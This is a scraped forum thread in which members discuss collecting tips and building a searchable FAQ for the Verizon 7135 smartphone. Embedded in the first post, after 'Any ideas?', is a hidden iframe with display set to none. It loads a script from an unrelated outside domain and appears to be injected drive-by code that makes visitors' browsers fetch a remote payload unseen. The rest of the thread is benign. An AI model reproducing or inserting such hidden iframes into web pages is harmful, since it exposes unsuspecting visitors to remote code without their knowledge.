+ Reply to Thread

Thread: "7135 Tips"

"7135 Tips"

Hope this is not "improper" --but decided to repost my today reply to the "Got one" thread in hopes of creating a dialogue on the issue and encouraging a solution. The comment was:

After reading Glenn Butler's nice piece on this thread (Thanks Glenn) I decided to start my own "cache" of reviews, tips and misc ideas in anticipation of the BIG DAY (owning and holding my very own Verizon 7135). The one disadvantage to the discussions so far is that there's no central "thread" listing members reviews to date and replies that deal with "fixes" like iJITSU's reply to Glenn's issues related to backlight and searching names. Oh I know the Search system is my best friend but how do you search for the answer to a problem you don't even know you have???
    And yes I know there's a 7135 FAQ but items like the Butler/iJITSU exchange don't get there. Seems like a "7135 TIPS" page might be in order or perhaps members/guests could be advised to add a searhable "Bullet" or marker of some kind whenever they are posting a solution/answer that could be a useful piece of knowledge for the rest of us. Not a criticism folks--only a suggestion. Love this group almost as much as I'll love my new Verizon 7135. Keep it coming.

Any ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I like the idea!

Lets put them in the FAQ folder and label so they can be searched.

Titles like: "7035_TIP_0001 -- WAP Settings"

and then it would contain the proper settings in the body.

In thefuture if a newbie asked about them someone could sayu look at the TIPs or... Search for TIP_xxxx
    iPhone therefore iAm.

FAQ

I'm working on an FAQ with a little help from some smartphone owners. If you'd like to help out, let me know.

The idea is to create a place where a novice can easily navigate to all the info they need to get going with a 7135. The FAQ is user fed, but displayed in a non-forum type fashion. The more people that participate, the more useful it will be.

Let me know if you want to help out.

*edited by moderator*
    Mike Collins
    pdaPhoneHome.com, Home of the i330 FAQ